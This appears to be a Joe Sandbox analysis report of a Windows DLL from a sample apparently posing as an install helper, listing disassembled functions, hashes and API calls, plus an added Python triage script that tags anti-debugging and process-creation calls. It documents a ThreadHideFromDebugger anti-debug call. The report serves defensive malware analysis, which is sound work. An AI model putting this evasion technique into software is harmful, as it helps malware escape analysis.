                              • Instruction Fuzzy Hash: 26317C74608304DFD7109F28C886B0ABBF8AF95718F5189AAE489C7B60D331D8498B52

                              Control-flow Graph

                              control_flow_graph 7821 6c793886-6c79388e 7822 6c793970-6c79397d 7821->7822 7823 6c793894-6c793896 7821->7823 7825 6c79397f-6c793989 7822->7825 7826 6c7939f1-6c7939f8 7822->7826 7823->7822 7824 6c79389c-6c7938b9 7823->7824 7827 6c7938c0-6c7938c1 7824->7827 7825->7824 7828 6c79398f-6c793994 7825->7828 7829 6c7939fe-6c793a03 7826->7829 7830 6c793ab5-6c793aba 7826->7830 7833 6c79395e 7827->7833 7835 6c79399a-6c79399f 7828->7835 7836 6c793b16-6c793b18 7828->7836 7831 6c793a09-6c793a2f 7829->7831 7832 6c7938d2-6c7938d4 7829->7832 7830->7824 7834 6c793ac0-6c793ac7 7830->7834 7837 6c7938f8-6c793955 7831->7837 7838 6c793a35-6c793a3a 7831->7838 7839 6c793957-6c79395c 7832->7839 7840 6c793960-6c793964 7833->7840 7834->7827 7841 6c793acd-6c793ad6 7834->7841 7842 6c79383b-6c793855 call 6c8e19e0 call 6c8e19f0 7835->7842 7843 6c7939a5-6c7939bf 7835->7843 7836->7827 7837->7839 7844 6c793b1d-6c793b22 7838->7844 7845 6c793a40-6c793a57 7838->7845 7839->7833 7847 6c79396a 7840->7847 7848 6c793860-6c793885 7840->7848 7841->7836 7849 6c793ad8-6c793aeb 7841->7849 7842->7848 7850 6c793a5a-6c793a5d 7843->7850 7856 6c793b49-6c793b50 7844->7856 7857 6c793b24-6c793b44 7844->7857 7845->7850 7853 6c793ba1-6c793bb6 7847->7853 7848->7821 7849->7837 7854 6c793af1-6c793af8 7849->7854 7851 6c793aa9-6c793ab0 7850->7851 7851->7840 7859 6c793bc0-6c793bda call 6c8e19e0 call 6c8e19f0 7853->7859 7861 6c793afa-6c793aff 7854->7861 7862 6c793b62-6c793b85 7854->7862 7856->7827 7858 6c793b56-6c793b5d 7856->7858 7857->7851 7858->7840 7872 6c793be0-6c793bfe 7859->7872 7861->7839 7862->7837 7865 6c793b8b 7862->7865 7865->7853 7875 6c793e7b 7872->7875 7876 6c793c04-6c793c11 7872->7876 7877 6c793e81-6c793ee0 call 6c793750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6c793ce0-6c793cea 7876->7878 7879 6c793c17-6c793c20 7876->7879 7894 6c793eea-6c793f04 call 6c8e19e0 call 6c8e19f0 7877->7894 7881 6c793d3a-6c793d3c 7878->7881 7882 6c793cec-6c793d0c 7878->7882 7883 6c793dc5 
7879->7883 7884 6c793c26-6c793c2d 7879->7884 7889 6c793d3e-6c793d45 7881->7889 7890 6c793d70-6c793d8d 7881->7890 7888 6c793d90-6c793d95 7882->7888 7891 6c793dc6 7883->7891 7885 6c793dc3 7884->7885 7886 6c793c33-6c793c3a 7884->7886 7885->7883 7892 6c793c40-6c793c5b 7886->7892 7893 6c793e26-6c793e2b 7886->7893 7896 6c793dba-6c793dc1 7888->7896 7897 6c793d97-6c793db8 7888->7897 7895 6c793d50-6c793d57 7889->7895 7890->7888 7898 6c793dc8-6c793dcc 7891->7898 7899 6c793e1b-6c793e24 7892->7899 7900 6c793c7b-6c793cd0 7893->7900 7901 6c793e31 7893->7901 7915 6c793f75-6c793fa1 7894->7915 7895->7891 7896->7885 7903 6c793dd7-6c793ddc 7896->7903 7897->7883 7898->7872 7904 6c793dd2 7898->7904 7899->7898 7905 6c793e76-6c793e79 7899->7905 7900->7895 7901->7859 7907 6c793dde-6c793e17 7903->7907 7908 6c793e36-6c793e3d 7903->7908 7904->7905 7905->7877 7907->7899 7909 6c793e5c-6c793e5f 7908->7909 7910 6c793e3f-6c793e5a 7908->7910 7909->7900 7913 6c793e65-6c793e69 7909->7913 7910->7899 7913->7898 7913->7905 7919 6c794020-6c794026 7915->7919 7920 6c793fa3-6c793fa8 7915->7920 7921 6c79402c-6c79403c 7919->7921 7922 6c793f06-6c793f35 7919->7922 7923 6c79407c-6c794081 7920->7923 7924 6c793fae-6c793fcf 7920->7924 7928 6c79403e-6c794058 7921->7928 7929 6c7940b3-6c7940b8 7921->7929 7927 6c793f38-6c793f61 7922->7927 7925 6c7940aa-6c7940ae 7923->7925 7926 6c794083-6c79408a 7923->7926 7924->7925 7930 6c793f6b-6c793f6f 7925->7930 7926->7927 7931 6c794090 7926->7931 7933 6c793f64-6c793f67 7927->7933 7934 6c79405a-6c794063 7928->7934 7929->7924 7932 6c7940be-6c7940c9 7929->7932 7930->7915 7931->7894 7935 6c7940a7 7931->7935 7932->7925 7936 6c7940cb-6c7940d4 7932->7936 7937 6c793f69 7933->7937 7938 6c794069-6c79406c 7934->7938 7939 6c7940f5-6c79413f 7934->7939 7935->7925 7936->7935 7942 6c7940d6-6c7940f0 7936->7942 7937->7930 7940 6c794072-6c794077 7938->7940 7941 6c794144-6c79414b 7938->7941 7939->7937 7940->7933 7941->7930 7942->7934
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f19ece6dcd947847027d22b99eb0a89f3dc67037457fcd7e0f1687e0c9cf483c
                              • Instruction ID: 972263a8e8871a3819b20869472f4922b7e445271e0d5f5eae5f40d4d1a6baa2
                              • Opcode Fuzzy Hash: f19ece6dcd947847027d22b99eb0a89f3dc67037457fcd7e0f1687e0c9cf483c
                              • Instruction Fuzzy Hash: E0321532245B018FC324CF28D9D0695B7E3EFD13287698A6DC0EA4BB96D775B44ACB50

                              Control-flow Graph

                              control_flow_graph 7969 6c793a6a-6c793a85 7970 6c793a87-6c793aa7 7969->7970 7971 6c793aa9-6c793ab0 7970->7971 7972 6c793960-6c793964 7971->7972 7973 6c79396a 7972->7973 7974 6c793860-6c79388e 7972->7974 7975 6c793ba1-6c793bb6 7973->7975 7983 6c793970-6c79397d 7974->7983 7984 6c793894-6c793896 7974->7984 7977 6c793bc0-6c793bda call 6c8e19e0 call 6c8e19f0 7975->7977 7991 6c793be0-6c793bfe 7977->7991 7988 6c79397f-6c793989 7983->7988 7989 6c7939f1-6c7939f8 7983->7989 7984->7983 7986 6c79389c-6c7938b9 7984->7986 7990 6c7938c0-6c7938c1 7986->7990 7988->7986 7992 6c79398f-6c793994 7988->7992 7993 6c7939fe-6c793a03 7989->7993 7994 6c793ab5-6c793aba 7989->7994 7997 6c79395e 7990->7997 8013 6c793e7b 7991->8013 8014 6c793c04-6c793c11 7991->8014 8000 6c79399a-6c79399f 7992->8000 8001 6c793b16-6c793b18 7992->8001 7995 6c793a09-6c793a2f 7993->7995 7996 6c7938d2-6c7938d4 7993->7996 7994->7986 7998 6c793ac0-6c793ac7 7994->7998 8002 6c7938f8-6c793955 7995->8002 8003 6c793a35-6c793a3a 7995->8003 8004 6c793957-6c79395c 7996->8004 7997->7972 7998->7990 8005 6c793acd-6c793ad6 7998->8005 8007 6c79383b-6c793855 call 6c8e19e0 call 6c8e19f0 8000->8007 8008 6c7939a5-6c7939bf 8000->8008 8001->7990 8002->8004 8009 6c793b1d-6c793b22 8003->8009 8010 6c793a40-6c793a57 8003->8010 8004->7997 8005->8001 8012 6c793ad8-6c793aeb 8005->8012 8007->7974 8015 6c793a5a-6c793a5d 8008->8015 8019 6c793b49-6c793b50 8009->8019 8020 6c793b24-6c793b44 8009->8020 8010->8015 8012->8002 8018 6c793af1-6c793af8 8012->8018 8017 6c793e81-6c793ee0 call 6c793750 GetCurrentThread NtSetInformationThread 8013->8017 8021 6c793ce0-6c793cea 8014->8021 8022 6c793c17-6c793c20 8014->8022 8015->7971 8043 6c793eea-6c793f04 call 6c8e19e0 call 6c8e19f0 8017->8043 8028 6c793afa-6c793aff 8018->8028 8029 6c793b62-6c793b85 8018->8029 8019->7990 8023 6c793b56-6c793b5d 8019->8023 8020->7970 8025 6c793d3a-6c793d3c 8021->8025 8026 6c793cec-6c793d0c 8021->8026 8030 6c793dc5 8022->8030 8031 6c793c26-6c793c2d 
8022->8031 8023->7972 8037 6c793d3e-6c793d45 8025->8037 8038 6c793d70-6c793d8d 8025->8038 8036 6c793d90-6c793d95 8026->8036 8028->8004 8029->8002 8034 6c793b8b 8029->8034 8039 6c793dc6 8030->8039 8032 6c793dc3 8031->8032 8033 6c793c33-6c793c3a 8031->8033 8032->8030 8041 6c793c40-6c793c5b 8033->8041 8042 6c793e26-6c793e2b 8033->8042 8034->7975 8045 6c793dba-6c793dc1 8036->8045 8046 6c793d97-6c793db8 8036->8046 8044 6c793d50-6c793d57 8037->8044 8038->8036 8047 6c793dc8-6c793dcc 8039->8047 8048 6c793e1b-6c793e24 8041->8048 8049 6c793c7b-6c793cd0 8042->8049 8050 6c793e31 8042->8050 8064 6c793f75-6c793fa1 8043->8064 8044->8039 8045->8032 8052 6c793dd7-6c793ddc 8045->8052 8046->8030 8047->7991 8053 6c793dd2 8047->8053 8048->8047 8054 6c793e76-6c793e79 8048->8054 8049->8044 8050->7977 8056 6c793dde-6c793e17 8052->8056 8057 6c793e36-6c793e3d 8052->8057 8053->8054 8054->8017 8056->8048 8058 6c793e5c-6c793e5f 8057->8058 8059 6c793e3f-6c793e5a 8057->8059 8058->8049 8062 6c793e65-6c793e69 8058->8062 8059->8048 8062->8047 8062->8054 8068 6c794020-6c794026 8064->8068 8069 6c793fa3-6c793fa8 8064->8069 8070 6c79402c-6c79403c 8068->8070 8071 6c793f06-6c793f35 8068->8071 8072 6c79407c-6c794081 8069->8072 8073 6c793fae-6c793fcf 8069->8073 8077 6c79403e-6c794058 8070->8077 8078 6c7940b3-6c7940b8 8070->8078 8076 6c793f38-6c793f61 8071->8076 8074 6c7940aa-6c7940ae 8072->8074 8075 6c794083-6c79408a 8072->8075 8073->8074 8079 6c793f6b-6c793f6f 8074->8079 8075->8076 8080 6c794090 8075->8080 8082 6c793f64-6c793f67 8076->8082 8083 6c79405a-6c794063 8077->8083 8078->8073 8081 6c7940be-6c7940c9 8078->8081 8079->8064 8080->8043 8084 6c7940a7 8080->8084 8081->8074 8085 6c7940cb-6c7940d4 8081->8085 8086 6c793f69 8082->8086 8087 6c794069-6c79406c 8083->8087 8088 6c7940f5-6c79413f 8083->8088 8084->8074 8085->8084 8091 6c7940d6-6c7940f0 8085->8091 8086->8079 8089 6c794072-6c794077 8087->8089 8090 6c794144-6c79414b 8087->8090 8088->8086 8089->8082 8090->8079 8091->8083
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 3eb60d0c2388ed686f9d4d8a6fcf4f312a720c2094db611815b55ba2f94e2965
                              • Instruction ID: 2385ddbb7d0816f05fcdd892ee2c45eeccdad0f31fdde821b6d2462e99f9e8b5
                              • Opcode Fuzzy Hash: 3eb60d0c2388ed686f9d4d8a6fcf4f312a720c2094db611815b55ba2f94e2965
                              • Instruction Fuzzy Hash: 1351E231148B018FC320CF28D980795B7E3BF96314F698B5DC0EA5BA96DB74B44A9B51
                              APIs
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 44a0c13e7e6d76fdc7ba829206cd2697ddc9281dc1543315dfb00704b3006529
                              • Instruction ID: 122c0796fb59c6ccd1a3eae685fe7b156417c3e35931d17dbe6979889f156254
                              • Opcode Fuzzy Hash: 44a0c13e7e6d76fdc7ba829206cd2697ddc9281dc1543315dfb00704b3006529
                              • Instruction Fuzzy Hash: 7351D331148B018FC320CF28D580795B7E3BF96324F698F5DC0EA5BA96DB71B44A9B91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA (ThreadInformationClass 0x11 = ThreadHideFromDebugger: the calling thread stops delivering debug events to an attached debugger, which is the behaviour behind the "Hides threads from debuggers" signature)
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7cc112b0f0148b57d28b214ef6b91d4c21c575a0a12715ac4231e37fb997f571
                              • Instruction ID: 700c1cf54072a0bac08503d52ea3fc80f96a6a8e5ff468e17e57e56807db32df
                              • Opcode Fuzzy Hash: 7cc112b0f0148b57d28b214ef6b91d4c21c575a0a12715ac4231e37fb997f571
                              • Instruction Fuzzy Hash: 8731E131249B018BC320CF28D9947C6B7A3AF96318F698B5DC0AA5BA92DB7474099B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: af5a9f8bfcc21cc3733ce029148d3337113254a5afab6bff400d333f53b841f8
                              • Instruction ID: 8a6f75966cb32e1ab900cc4f1ab51c28b757f6e291735d1b9e0e6cacd475a72b
                              • Opcode Fuzzy Hash: af5a9f8bfcc21cc3733ce029148d3337113254a5afab6bff400d333f53b841f8
                              • Instruction Fuzzy Hash: CA312F31108B01CBC324CF28D690796B7B7BF96308F294E5DC0EA4BA92DB71B449DB91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 87d276e0cfdeb4d7d857365355a3dc3b3dc76036ca43e45e2686b5ce9cd6c08a
                              • Instruction ID: 18792d758f35a4da6d828bf10ecad38fb5568ab8b97668e82ee4e67ce1408c66
                              • Opcode Fuzzy Hash: 87d276e0cfdeb4d7d857365355a3dc3b3dc76036ca43e45e2686b5ce9cd6c08a
                              • Instruction Fuzzy Hash: B021F431158B018BD324CF28D99479677B7AF56348F584F2DC0BA8BA91DB74B4049B51
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9156A0 (local machine, active database, dwDesiredAccess 0x1 = SC_MANAGER_CONNECT: enough to open existing services, not to create one)
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: 752acf1b80a8a27c3f91b599bb1555c7986a54de3da3af26c5f303696bc78aec
                              • Instruction ID: 62eca5c5ed20664621331be990b2083aad699d74e4717d6b46b17d68ed83efb3
                              • Opcode Fuzzy Hash: 752acf1b80a8a27c3f91b599bb1555c7986a54de3da3af26c5f303696bc78aec
                              • Instruction Fuzzy Hash: 12314AB460C346EFD700CF28C596B4ABBF4AB89768F51885EF899C6760C371C8459B63
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C90B44C
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3f1d0cf6460c1ef2eb733728777691d11cb4ab635cf28734d00104dd45a26d72
                              • Instruction ID: 05fd383452951d1bfe6b3e9468e56f974307111480864475406419056c016e96
                              • Opcode Fuzzy Hash: 3f1d0cf6460c1ef2eb733728777691d11cb4ab635cf28734d00104dd45a26d72
                              • Instruction Fuzzy Hash: 71113674608351AFD7008B29D58451EBBF4AF86318F148E5DF4A8CBB91D330CD888B02
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C8EB117
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 3a9b43ad0fd70f55e7dd6f7573c21ec98e6b949e88ecb394e0b4ad903058f431
                              • Instruction ID: 9682016936c5ee14bb5a21393798bf1cfebb94097ea12dd9973605951bd0e06f
                              • Opcode Fuzzy Hash: 3a9b43ad0fd70f55e7dd6f7573c21ec98e6b949e88ecb394e0b4ad903058f431
                              • Instruction Fuzzy Hash: 5862497060D3858FC724CF28C590A6ABBE1ABDA314F248D1EF4A9CB751D735E8458B4B

                              Control-flow Graph (rendered graph omitted): function 6c92d043-6c92d3f2; API calls in the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: d68846fe5555026fe13cf892f92be90cbb690a932f1f43eb033a55d91ab1de6b
                              • Instruction ID: 018473658db19bef78c5d496ebede96b2c910a9854fbb3111cbae645f4e8631c
                              • Opcode Fuzzy Hash: d68846fe5555026fe13cf892f92be90cbb690a932f1f43eb033a55d91ab1de6b
                              • Instruction Fuzzy Hash: 8EC13772E182499FDF05DF99C880BADBBB4AF5A31CF104158E494ABF85C778D906CB60

                              Control-flow Graph (rendered graph omitted): function 6c9345dc-6c934905; API calls in the graph: GetFileType, GetLastError, CloseHandle
                              APIs
                                • Part of subcall function 6C9349C7: CreateFileW.KERNEL32(00000000,00000000,?,6C934685,?,?,00000000,?,6C934685,00000000,0000000C), ref: 6C9349E4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9346F0
                              • __dosmaperr.LIBCMT ref: 6C9346F7
                              • GetFileType.KERNEL32(00000000), ref: 6C934703
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C93470D
                              • __dosmaperr.LIBCMT ref: 6C934716
                              • CloseHandle.KERNEL32(00000000), ref: 6C934736
                              • CloseHandle.KERNEL32(6C92B640), ref: 6C934883
                              • GetLastError.KERNEL32 ref: 6C9348B5
                              • __dosmaperr.LIBCMT ref: 6C9348BC
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: c2a046b8085480dddf6832589157001ed0c0336afabdedc4847d7a446ea487c6
                              • Instruction ID: dd96bf7d24f9994cb4713e8980866f87335d56811d63777c84eedff39bbe2224
                              • Opcode Fuzzy Hash: c2a046b8085480dddf6832589157001ed0c0336afabdedc4847d7a446ea487c6
                              • Instruction Fuzzy Hash: A0A14632A082698FCF099F68C8517ED7FB5AB07328F195259E815AF790CB36C816CF51
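The function listings above record raw argument values only. The following Python helper is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses the `Api.MODULE(args), ref: addr` lines exactly as they appear in these listings, decodes the arguments that identify a technique (the NtSetInformationThread class 0x11 = ThreadHideFromDebugger behind the "Hides threads from debuggers" signature, and the OpenSCManagerA access mask), and groups the calls by tag for triage. The constant values come from the Windows SDK headers (THREADINFOCLASS, winsvc.h SC_MANAGER_* rights); the regex, the tag names and the sample text (lines copied from the listings on this page) are this example's own assumptions.

```python
"""Triage the 'APIs' lines of a Joe Sandbox function listing.

Added example; not code from the report or from Joe Security. Constants are
assumed from the Windows SDK headers; everything else is local to this script.
"""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"   # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                            # optional (arg,arg,...)
    r",?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"                   # call-site address
)

# THREADINFOCLASS value passed to NtSetInformationThread to hide a thread
THREAD_HIDE_FROM_DEBUGGER = 0x11

# Service Control Manager access rights (winsvc.h)
SC_MANAGER_RIGHTS = {
    0x0001: "SC_MANAGER_CONNECT",
    0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE",
    0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS",
    0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list        # one int per argument, None where the report shows '?'
    ref: int          # address of the call site
    tags: list = field(default_factory=list)


def _parse_arg(token):
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def parse_api_line(line):
    """Return an ApiCall for one report line, or None if it is not an API line."""
    m = API_LINE.search(line)
    if m is None:
        return None
    raw = m.group("args")
    args = [_parse_arg(a) for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def tag_call(call):
    """Attach technique tags based on the API name and the decoded arguments."""
    a = call.args
    if call.name == "NtSetInformationThread" and len(a) > 1 and a[1] == THREAD_HIDE_FROM_DEBUGGER:
        call.tags.append("anti-debug:ThreadHideFromDebugger")
    if call.name.startswith("OpenSCManager") and len(a) > 2 and a[2] is not None:
        rights = [n for bit, n in SC_MANAGER_RIGHTS.items() if a[2] & bit] or ["none"]
        call.tags.append("scm-access:" + "|".join(rights))
    if call.name.startswith("CreateProcess"):
        call.tags.append("process-creation")
    if call.name.startswith("FindFirstFile"):
        call.tags.append("file-enumeration")
    return call


def triage(report_text):
    """Parse and tag every API line found in a block of report text."""
    calls = []
    for line in report_text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            calls.append(tag_call(call))
    return calls


def findings(calls):
    """Group tagged calls: {tag: [(api name, call-site address), ...]}."""
    out = {}
    for c in calls:
        for t in c.tags:
            out.setdefault(t, []).append((c.name, c.ref))
    return out


# Sample input: lines copied verbatim from the function listings in this report
SAMPLE = """\
• GetCurrentThread.KERNEL32 ref: 6C793E9D
• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9156A0
• FindFirstFileA.KERNEL32(?,?), ref: 6C90B44C
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C8EB117
  • Part of subcall function 6C9349C7: CreateFileW.KERNEL32(00000000,00000000,?,6C934685,?,?,00000000,?,6C934685,00000000,0000000C), ref: 6C9349E4
• __dosmaperr.LIBCMT ref: 6C9346F7
"""

if __name__ == "__main__":
    for tag, sites in findings(triage(SAMPLE)).items():
        print(tag, ", ".join(f"{n}@{r:08X}" for n, r in sites))
```

Feed it the "APIs" blocks of any function in the report (or the whole text export) and the anti-debug call sites surface by address, which is what you want before opening the dump in a disassembler. Unresolved arguments ("?") are kept as None rather than guessed, so a tag is only emitted when the report actually recorded the value.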

                              Control-flow Graph (rendered graph omitted): function 6c8ec750-6c8eca47; API calls in the graph: WriteFile, ReadFile
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: de7a011bfa97b266678fae0ab153854e49b857d5c13875a5766593a9b4cf0a97
                              • Instruction ID: 120804882fafef8a18ba79b46e25bb20403a8a3ce49f4dfa729ffdc3bcd6b54f
                              • Opcode Fuzzy Hash: de7a011bfa97b266678fae0ab153854e49b857d5c13875a5766593a9b4cf0a97
                              • Instruction Fuzzy Hash: 97714CB0608345AFD720DF19C980B5ABBF5BF8E708F104D2EF495D6A52D771D8488B92
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 07f7fc4445188678bca3e81401079bea4991489627b919dbd9ac4bc40f02dd94
                              • Instruction ID: 87119b2d08f7507dcb33feebba84158d4721555031712722f30e80244b08013c
                              • Opcode Fuzzy Hash: 07f7fc4445188678bca3e81401079bea4991489627b919dbd9ac4bc40f02dd94
                              • Instruction Fuzzy Hash: 7A427674A093468FC724DF18C18062ABBE1AF8A319F248D5EF5A58BB21D738D845CB57
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: c3581901a74c15f0834d4b7267d718c521a8b911adbc42cd73f2b1d82d046bd8
                              • Instruction ID: 1fced8819807b6766a3881d63bc6517c57125ade46401936de7cb112ac20fddd
                              • Opcode Fuzzy Hash: c3581901a74c15f0834d4b7267d718c521a8b911adbc42cd73f2b1d82d046bd8
                              • Instruction Fuzzy Hash: 3E03E071645B018FC728CF28C9D0696B7E3AFD5328719CB7DC0AA4BA95DB34B44ACB40

                              Control-flow Graph (rendered graph omitted): function 6c915560-6c915688; API calls in the graph: CreateProcessA, WaitForSingleObject, CloseHandle (x2)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmp
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 82113b60b24b9c51f2a31c1585138b7f1d2b61c41c9d4d8a9ba3184dc9475ac7
                              • Instruction ID: 79cc591382274901f7e02e89c9415c76134d314fce30f32a99710b48f7d508cb
                              • Instruction Fuzzy Hash: 773102B09093408FD340DF29C19971EBBF0AB9A358F419A1DF4D986650E7B4D5898F43

                              Control-flow Graph (rendered graph omitted; entry block 6c92c1ce-6c92c1ea, API calls annotated on the graph: WriteFile, GetLastError)
                              APIs
                                • Part of subcall function 6C92C421: GetConsoleCP.KERNEL32(?,6C92B640,?), ref: 6C92C469
                              • WriteFile.KERNEL32(?,?,6C934C5C,00000000,00000000,?,00000000,00000000,6C936026,00000000,00000000,?,00000000,6C92B640,6C934C5C,00000000), ref: 6C92C31F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C934C5C,6C92B640,00000000,?,?,?,?,00000000,?), ref: 6C92C329
                              • __dosmaperr.LIBCMT ref: 6C92C36E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 463db2052c5bfd28d74404b8bb438ca82ca2e77f41d0733da94e1ffc8517769e
                              • Instruction ID: 58ec94ed5ca29b0873e60fe3db96b3c9072c58dc96f711e896ec1c53395f59d0
                              • Instruction Fuzzy Hash: 3D51E271A2520EAAFB00AFE4C841BEEBBB9FF1A318F100511E490A7A44D779D9058760

                              Control-flow Graph (rendered graph omitted; entry block 6c916100-6c91610c, internal calls only)
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9162A1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: a2188b052461a2128a0b96dca3b3a31880e42dd5a5fdd36bf4ae4da3e518d3d2
                              • Instruction ID: 8d15195269ddfbb9b7f801f9efc5198e6d9ebdba9da1a07224ca943b137baeba
                              • Instruction Fuzzy Hash: 9B5142B5900B408FD725CF29C596B96BBF1FB58318F008A2DD8868BB91D775F909CB90

                              Control-flow Graph (rendered graph omitted; entry block 6c92be95-6c92bea9, API calls annotated on the graph: CloseHandle, GetLastError)
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9347CF), ref: 6C92BEEB
                              • GetLastError.KERNEL32(?,00000000,?,6C9347CF), ref: 6C92BEF5
                              • __dosmaperr.LIBCMT ref: 6C92BF20
                              Memory Dump Source
